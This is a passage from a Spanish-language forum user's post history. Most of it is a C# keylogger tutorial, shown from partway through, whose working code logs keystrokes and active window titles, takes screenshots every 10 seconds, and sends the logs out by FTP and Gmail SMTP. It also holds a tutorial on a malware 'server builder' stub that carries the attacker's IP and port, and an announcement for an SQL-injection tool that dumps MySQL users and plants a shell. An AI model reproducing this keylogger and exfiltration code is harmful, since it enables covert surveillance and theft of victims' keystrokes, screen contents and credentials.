  41.                }
  42.            }
  43.  
  44.        }
  45.  

Se deberia ver algo asi :



Como ven en este codigo explico como detectar mayusculas y minisculas , ya sea por Shift o CapsLock este codigo las detecta igual y guardas las teclas un log html usando la funcion savefile().

Ahora le hacemos doble click al primer boton , es el que activa la captura de las teclas "Capture Keys ON" , para poder poner el siguiente codigo :

Código
  1.        private void button1_Click(object sender, EventArgs e)
  2.        {
  3.            timer1.Enabled = true; // Activamos el timer1
  4.            label1.Text = "ON"; // Ponemos "ON" como texto en label1
  5.        }
  6.  

Con este codigo vamos a poder activar la captura de las teclas pero para poder desactivar el timer y que no siga capturando tenemos que hacer doble click en el segundo boton , el que dice "Capture Keys OFF" para poner este codigo :

Código
  1.        private void button2_Click(object sender, EventArgs e)
  2.        {
  3.            timer1.Enabled = false; // Desactivamos el timer1
  4.            label1.Text = "OFF";// Ponemos "OFF" como texto en label2
  5.        }
  6.  

Con eso ya estaria la captura de teclas mayusculas y minusculas.

0x03 : Capturar el nombre de las ventanas activas

Para poder capturar el nombre de las ventanas activas tenemos que declarar las siguiente variables globales al inicio del codigo :

Código
  1.        string nombre1 = ""; // Declaramos la variable string nombre1 como vacia ("")
  2.        string nombre2 = ""; // Declaramos  la variable string nombre2 como vacia ("")
  3.  

Estas lineas son necesarias para guardar los nombres de las ventanas y comparar para saber cual es la actual , para poder capturar el nombres de las ventanas activas tambien tenemos que agregar estas lineas al inicio del codigo :

Código
  1.        [DllImport("user32.dll")]
  2.        static extern IntPtr GetForegroundWindow();
  3.  
  4.        [DllImport("user32.dll")]
  5.        static extern int GetWindowText(IntPtr ventana, StringBuilder cadena, int cantidad);
  6.  


Ahora tenemos que agregar el segundo timer al formulario , para hacerle doble click y agregar el siguiente  codigo :

Código
  1.        private void timer2_Tick(object sender, EventArgs e)
  2.        {
  3.            const int limite = 256; // Declaramos un entero constante con valor de 256
  4.            StringBuilder buffer = new StringBuilder(limite); // Declaramos un StringBuilder en buffer usando el int limite
  5.            IntPtr manager = GetForegroundWindow(); // Declaramos manager como IntPtr usando GetForegroundWindow para poder
  6.                                                    // obtener el nombre de la ventana actual
  7.  
  8.            if (GetWindowText(manager, buffer, limite) > 0) // Obtenemos el nombre de la ventana y lo almacenamos en buffer
  9.            {
  10.                nombre1 = buffer.ToString(); // Almacenamos el nombre de la ventana en nombre1
  11.  
  12.                if (nombre1 != nombre2) // Si nombre1 y nombre2 no son iguales ...
  13.                {
  14.                    nombre2 = nombre1; // nombre2 tendra el valor de nombre1
  15.                    savefile("logs.html", "<br>[" + nombre2 + "]<br>"); // Agregamos el nombre de la ventana en el archivo de texto
  16.                }
  17.            }
  18.  
  19.        }
  20.  

Como en la siguiente imagen :



Ahora hacemos doble click en el tercer boton que se llama "Capture Windows ON" para poner el siguiente codigo :

Código
  1.        private void button3_Click(object sender, EventArgs e)
  2.        {
  3.            timer2.Enabled = true; // Activamos el timer2
  4.            label2.Text = "ON"; //Ponemos "ON" como texto en label2
  5.        }
  6.  

Despues de eso hacemos doble click en el cuarto boton que se llama "Capture Windows OFF" para poner el siguiente codigo :

Código
  1.        private void button4_Click(object sender, EventArgs e)
  2.        {
  3.            timer2.Enabled = false; // Desactivamos el timer2
  4.            label2.Text = "OFF"; // Ponemos "OFF" como texto en label2
  5.        }
  6.  

Con esto terminariamos la funcion de capturar las ventanas activas.

0x04 : Tomar un ScreenShot de la pantalla

Para esta funcion lo primero que hay que hacer es agregar esta linea al inicio del codigo :

Código
  1. using System.Drawing.Imaging;
  2.  

Bien ahora para que el programa capture la pantalla cada cierto tiempo tenemos que agregar el tercer timer al formulario para ponerle como tiempo o Interval un valor de "10000" que serian 10 segundos porque el interval exige que el tiempo sea expresado en milisegundos.
Despues de eso agregan esta funcion al inicio del codigo llamada screeshot() :

Código
  1.        public void screenshot(string nombre)
  2.        {
  3.            try
  4.            {
  5.                // ScreenShot Based on : http://www.dotnetjalps.com/2007/06/how-to-take-screenshot-in-c.html
  6.                // Thanks to Jalpesh vadgama
  7.  
  8.                int wid = Screen.GetBounds(new Point(0, 0)).Width; // Declaramos el int wid para calcular el tamaño de la pantalla
  9.                int he = Screen.GetBounds(new Point(0, 0)).Height; // Declaramos el int he para calcular el tamaño de la pantalla
  10.                Bitmap now = new Bitmap(wid, he); // Declaramos now como Bitmap con los tamaños de la pantalla
  11.                Graphics grafico = Graphics.FromImage((Image)now); // Declaramos grafico como Graphics usando el declarado now
  12.                grafico.CopyFromScreen(0, 0, 0, 0, new Size(wid, he)); // Copiamos el screenshot con los tamaños de la pantalla
  13.                // usando "grafico"
  14.                now.Save(nombre, ImageFormat.Jpeg); // Guardamos el screenshot con el nombre establecido en la funcion
  15.            }
  16.            catch
  17.            {
  18.                //
  19.            }
  20.  
  21.        }
  22.  

Para despues hacer doble click en el timer3 y poner el siguiente codigo :

Código
  1.        private void timer3_Tick(object sender, EventArgs e)
  2.        {
  3.            string fecha = DateTime.Now.ToString("h:mm:ss tt"); // Obtemos la hora actual usando DateTime y la guardamos en la
  4.                                                                // variable string con el nombre de fecha
  5.            string nombrefinal = fecha.Trim() + ".jpg"; // Limpiamos la variable fecha de los espacios en blanco y le agregamos
  6.                                                        // ".jpg" al final para terminar de generar el nombre de la imagen
  7.            string final = nombrefinal.Replace(":", "_"); // Reemplazamos los ":" de la hora por "_" para que no haya problemas
  8.                                                          // al crear la imagen
  9.            screenshot(final); // Usamos la funcion screenshot() para mandar el nombre de la imagen que tiene la variable "final"
  10.                               // y asi realizar el screenshot
  11.  
  12.        }
  13.  

Viendose asi en el codigo :



Ahora la parte que me estaba olvidando hagan doble click en el quinto boton , el que tiene como texto "Capture Screen ON" y
pongan el siguiente codigo :

Código
  1.            timer3.Enabled = true; // Activamos el timer3
  2.            label3.Text = "ON";  // Ponemos "ON" como texto en label3
  3.  

Ahora hagan doble click en el sexto boton , el que tiene como texto "Capture Screen OFF" y pongan el siguiente codigo :

Código
  1.            timer3.Enabled = false; // Desactivamos el timer3
  2.            label3.Text = "OFF";  // Ponemos "OFF" como texto en label3
  3.  


Con esto ya estaria terminada la parte de la captura de pantalla cada cierto tiempo , en este caso son cada 10 segundos.

0x05 : Subir logs a un servidor FTP

Bien , ahora para poder enviar logs por FTP necesitamos agregar estas lineas al inicio del codigo :

Código
  1. using System.Net;
  2. using System.IO;
  3.  

Despues de uso tambien tenemos que agregar esta funcion al inicio del codigo que sirve para subir archivos a un servidor FTP marcado :

Código
  1.        public void FTP_Upload(string servidor, string usuario, string password, string archivo)
  2.        {
  3.            // Based on : http://madskristensen.net/post/simple-ftp-file-upload-in-c-20
  4.  
  5.            try
  6.            {
  7.                WebClient ftp = new System.Net.WebClient(); // Iniciamos una instancia WebClient con "ftp"
  8.                ftp.Credentials = new System.Net.NetworkCredential(usuario, password); // Establecemos el login
  9.  
  10.                FileInfo dividir = new FileInfo(archivo); // Iniciamos una instancia FileInfo con "dividir"
  11.                string solo_nombre = dividir.Name; // Capturamos solo el nombre de la ruta del archivo de "archivo"
  12.  
  13.                ftp.UploadFile("ftp://"+servidor + "/" + solo_nombre, "STOR", archivo); // Subimos el archivo marcado con el siguiente
  14.                // formato -> ftp://localhost/archivo-a-subir.txt al servidor FTP
  15.            }
  16.            catch
  17.            {
  18.                //
  19.            }
  20.        }
  21.  

Ahora vamos hacer doble click sobre el septimo boton que tiene como texto "Send logs for FTP" para poner el siguiente codigo :

Código
  1.        private void button7_Click(object sender, EventArgs e)
  2.        {
  3.            FTP_Upload("localhost", "admin", "admin","logs.html"); // Usamos la funcion FTP_Upload para enviar el log por FTP
  4.                                                                                        // con los datos del servidor marcados
  5.        }
  6.  

Como ven tenemos "localhost" como servidor FTP y "admin" como usuario y password del servidor FTP , al final de la funcion tenemos "logs.html" que son los logs creados por el keylogger y listos para enviar al servidor FTP correspondiente.
Para probarlos en su servidor FTP tienen que cambiar los valores de servidor , usuario y password.

Pasemos al siguiente punto

0x06 : Mandar logs por Mail

Ahora vamos a ver como enviar los logs por mail , para poder hacerlo necesitan una cuenta en Gmail , si quieren registrarse en Gmail sin dar el telefono tienen que registrarte poniendo como direccion de correo alternativa una que sea con "@gmail.com" , en mi caso tambien puse la nacionalidad de Estados Unidos , no se si hace falta pero yo lo hice igual y safe de que me pidieran el telefono (no lo voy a dar ni muerto xD).
Bien para poder enviar correos usando Gmail necesitamos poner esta linea al inicio del codigo :

Código
  1. using System.Net.Mail;
  2.  

Despues tenemos que poner esta funcion al inicio del codigo que es la que uso para enviar Mails a Gmail :

Código
  1.        public void Gmail_Send(string usuario, string password, string target, string asunto, string mensaje_texto, string rutaarchivo)
  2.        {
  3.  
  4.            // Based on : http://www.codeproject.com/Tips/160326/Using-Gmail-Account-to-Send-Emails-With-Attachment
  5.  
  6.            MailAddress de = new MailAddress(usuario); // Establecemos la direccion de correo nuestra de Gmail para enviar el mail
  7.            MailAddress a = new MailAddress(target); // Establecemos la direccion de correo que va a recibir el correo
  8.  
  9.            MailMessage mensaje = new MailMessage(de, a); // Creamos la instancia MailMessage como "mensaje"  
  10.  
  11.            mensaje.Subject = asunto; // Establecemos en el mensaje el asunto
  12.            mensaje.Body = mensaje_texto; // Establecemos en el mensaje el texto del correo
  13.  
  14.            Attachment archivo = new Attachment(rutaarchivo); // Creamos la instancia Attachment como "archivo" donde marcamos la ruta del archivo adjunto que
  15.            // esta en la variable "rutaarchivo"
  16.  
  17.            mensaje.Attachments.Add(archivo); // Agregamos el archivo adjunto cargado anteriormente al "mensaje"
  18.  
  19.            SmtpClient gmailsender = new SmtpClient("smtp.gmail.com", 587); // Creamos la instancia SmtpClient como "gmailsender" ademas marcamos el host y
  20.            // el puerto de Gmail
  21.  
  22.            gmailsender.UseDefaultCredentials = false; // Desactivamos el UseDefaultCredentials en el "gmailsender"
  23.            gmailsender.EnableSsl = true; // Activamos el SSL en el "gmailsender"
  24.            gmailsender.Credentials = new NetworkCredential(usuario, password); // Establecemos el usuario y password de la cuenta nuestra de Gmail
  25.  
  26.            gmailsender.Send(mensaje); // Enviamos el mensaje  
  27.  
  28.        }
  29.  

Despues de eso hacemos doble click sobre el octavo y ultimo boton que tiene como texto "Send logs for Mail" para poner el siguiente codigo :

Código
  1.        private void button8_Click(object sender, EventArgs e)
  2.        {
  3.            Gmail_Send("tucorreo@gmail.com", "tupass", "target@hotmail.com", "Aca van los logs", "Disfruta los logs", "logs.html");
  4.            // Usamos la funcion Gmail_Send para enviar el log por Mail usando nuestra cuenta de Gmail con los datos aclarados en los argumentos de la funcion
  5.        }
  6.  

Como ven en la funcion tenemos como argumentos , el correo y password de nuestra cuenta gmail que usamos para enviar los logs , despues tenemos el correo donde van a llegar los logs , despues tenemos el titulo del mensaje que es "Aca van los logs" y el contenido del mensaje donde tenemos "Disfruta los logs" y para terminar tenemos la ruta de los logs del keylogger que es "logs.html".

Con eso pasamos el ultimo punto.

0x07 : Probando el programa

Bueno , creo que con esto cubrimos lo que es un keylogger basico (eso creo) , para probar solo tenemos que activar la captura de teclas , captura de ventanas y captura de screenshots desde su boton correspondiente , si queremos parar cierta funcion solo tenemos que hacer click sobre el boton de abajo correspondiente.

Se les deberia ver tal cual lo hicimos en el primer punto :



Para mandar los logs por FTP solo hagan click en el boton "Send logs for FTP" y despues de unos segundos tendran subidos los logs al servidor FTP que marcaron en la funcion del punto anterior.

En mi servidor FTP local se puede ver como se subieron los logs : logs.html



Lo mismo con el envio de logs por Mail con la diferencia de que ahora tienen que hacer click en el boton "Send logs for Mail" les dejo un ejemplo donde envio los logs a mi correo en hotmail :



Si quieren pueden ver los logs en formato HTML , en mi caso podre leer algo como esto en Firefox :



Creo que eso seria todo ...

--========--
  The End ?
--========--

Version PDF.

Version VideoTutorial



Eso es todo.
107  Programación / .NET (C#, VB.NET, ASP) / [C#] Creacion de un Server Builder en: 29 Agosto 2014, 21:13 pm
[Titulo] : Creacion de un Server Builder
[Lenguaje] : C#
[Autor] : Doddy Hackman

[Temario]

-- =================--------

0x01 : Introduccion
0x02 : Creacion del builder
0x03 : Creacion del stub
0x04 : Probando el programa

-- =================--------

0x01 : Introduccion

Ya habia hecho este manual en Delphi pero como me gusta traducir codigos ahora le toca a C# , para empezar el server builder se usa en el malware para poder generar el virus
o programa malicioso con datos importantes para el atacante como la ip , puerto o alguna configuracion que el server builder considera importante para el programa malicioso.
En este caso veremos solo la ip y el puerto , comencemos ...

0x02 : Creacion del builder

Para crear el server builder tenemos que crear un nuevo proyecto en Visual Studio de esta manera si usan la version 2010 :

Archivo -> Nuevo -> Proyecto -> Elegimos Aplicacion de Windows Forms y le damos en aceptar

Como en la siguiente imagen :



Ahora creemos dos textbox , uno va a ser para la IP y el otro textbox para el puerto , tambien agregamos un boton que sere el encargado de escribir en el stub , pueden poner
los tres en el lugar que quieran o sino haganlo como en la siguiente imagen :



Una vez hecho el diseño del form del builder vayan al codigo del formulario y agreguen este linea al inicio del codigo.

Código
  1. using System.IO; // Agregar esta linea al inicio del codigo para el manejo de archivos
  2.  

Despues hagan doble click en el boton que crearon para agregar el siguiente codigo :

Código
  1. FileStream abriendo = new FileStream("stub.exe", FileMode.Append); // Abrimos el stub.exe para escribir en el usando "abriendo"
  2. BinaryWriter seteando = new BinaryWriter(abriendo); // Usamos BinaryWriter para poder escribir en el archivo binario usando "seteando"
  3. seteando.Write("-IP-" + textBox1.Text + "-IP-" + "-PORT-" + textBox2.Text + "-PORT-"); // Escribimos en el archivo binario la IP y el puerto
  4.                                                                                       // usando los valores de los textBox1 y textBox2
  5. seteando.Flush(); // Hace que los datos almacenados en el buffer se escriban
  6. seteando.Close(); // Cerramos el BinaryWriter "seteando"
  7. abriendo.Close(); // Cerramos el FileStream "abriendo"
  8.  

Les deberia quedar algo asi :



Con esto ya estaria el server builder , ahora vamos al stub ...

0x03 : Creacion del stub

Bueno , ahora les voy a explicar como hacer el stub , para empezar creamos otro proyecto de la siguiente manera :

Archivo -> Nuevo -> Proyecto -> Elegimos Aplicacion de Windows Forms y le damos en aceptar

Como en la siguiente imagen :



Una vez creado el proyecto , agregamos al formulario 2 textBox y un boton que servira para cargar la configuracion , les deberia quedar algo asi :



Unz vez terminado todo , agregamos estas dos lineas al inicio del codigo del formulario :

Código
  1. using System.IO; // Agregar esta linea para el manejo de archivos
  2. using System.Text.RegularExpressions; // Agregar esta linea para el manejo de las expresiones regulares
  3.  

Ahora hacemos doble click en el boton creado :

Código
  1. private void button1_Click(object sender, EventArgs e)
  2. {
  3.  
  4. string ip = ""; // Declaramos la variable que contendra la IP como string
  5. string puerto = ""; // Declaramos la variable que tendra el puerto como string
  6.  
  7. StreamReader viendo = new StreamReader(Application.ExecutablePath); // Inicializamos la instancia StreamReader como "viendo" para abrir el stub
  8.  
  9. string contenido = viendo.ReadToEnd(); // Leemos el contenido del programa y guardamos el resultado en la variable "contenido"
  10.  
  11. Match regex = Regex.Match(contenido, "-IP-(.*?)-IP--PORT-(.*?)-PORT-", RegexOptions.IgnoreCase); // Usamos una expresion regular para buscar la ip
  12.                                                                                            // y el puerto
  13. if (regex.Success) // Si se encontro algo ...
  14. {
  15. ip = regex.Groups[1].Value; // Guardamos la ip encontrada en la variable "ip"
  16. puerto = regex.Groups[2].Value; // Guardamos el puerto encontrado en la variable "puerto"
  17. }
  18.  
  19. textBox1.Text = ip; // Ponemos la ip que obtuvimos en el textBox1
  20. textBox2.Text = puerto; // Ponemos el puerto que obtuvimos en el textBox2
  21.  
  22. }
  23.  

Les deberia quedar algo asi :



Con todo esto ya tenemos listo el server builder tanto el builder como el stub ahora nos toca probarlo ...

0x04 : Probando el programa

Una vez compilado el builder y el stub procedemos a probarlo , carguen el builder y ponganle los datos que les venga en gana en mi caso voy a poner como ip "localhost" y
como puerto "666" , despues carguen el stub y hagan click en el boton para cargar la configuracion , a continuacion les dejo una imagen de como quedaria el server builder
ademas en la imagen les muestro el stub cargado en WinHex para que vean que si funciona :



Eso seria todo.

Proximamente se viene un tutorial sobre como hacer un Keylogger en C# ...

--========--
  The End ?
--========--

Version PDF.

Version VideoTutorial :

108  Programación / .NET (C#, VB.NET, ASP) / Re: [Tutorial] Skins para C# en: 22 Agosto 2014, 21:26 pm
si , fue una mala idea cambiar las extensiones pero al final me resultaron mas comodos los txt xD.
109  Programación / .NET (C#, VB.NET, ASP) / [Tutorial] Skins para C# en: 22 Agosto 2014, 19:23 pm
Hola , aca les traigo un manual sobre como usar Skins en los formularios en C# , costo conseguirlos pero gracias a la recopilacion de atheros (foro indetectables) logre conseguir unos skins grosos que mostrare a continuacion.

Les dejo las imagenes de los skins :

Flow Theme



Fusion Theme



Future Theme



Genuine Theme



Modern Theme



Prime Theme



SkyDark Theme



Studio Theme



Tweety Theme



Drone Theme



Mephobia Theme



Para bajar la recopilacion de skins haganlo de aca , una vez descargados veran que los skins estan divididos en carpetas por versiones de Themebase , para usarlos tienen que crear una clase nueva en el proyecto de Visual Studio llamada Themebase.cs , en esta clase tienen que poner el codigo del archivo Themebase.txt de la carpeta en la que esta el skin que quieren probar , despues de crear esa clase tienen que crear otra con el nombre de Theme.cs , obviamente tienen que poner el codigo que tienen en el archivo Theme.txt que esta en la carpeta con el nombre de theme.

Les dejo un ejemplo de uso en youtube :



Eso seria todo.
110  Programación / .NET (C#, VB.NET, ASP) / [C#] K0bra 1.0 en: 15 Agosto 2014, 16:57 pm
Un simple scanner SQLI hecho en C#.

Con las siguientes funciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

Unas imagenes :









Si quieren lo puede bajar de aca.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines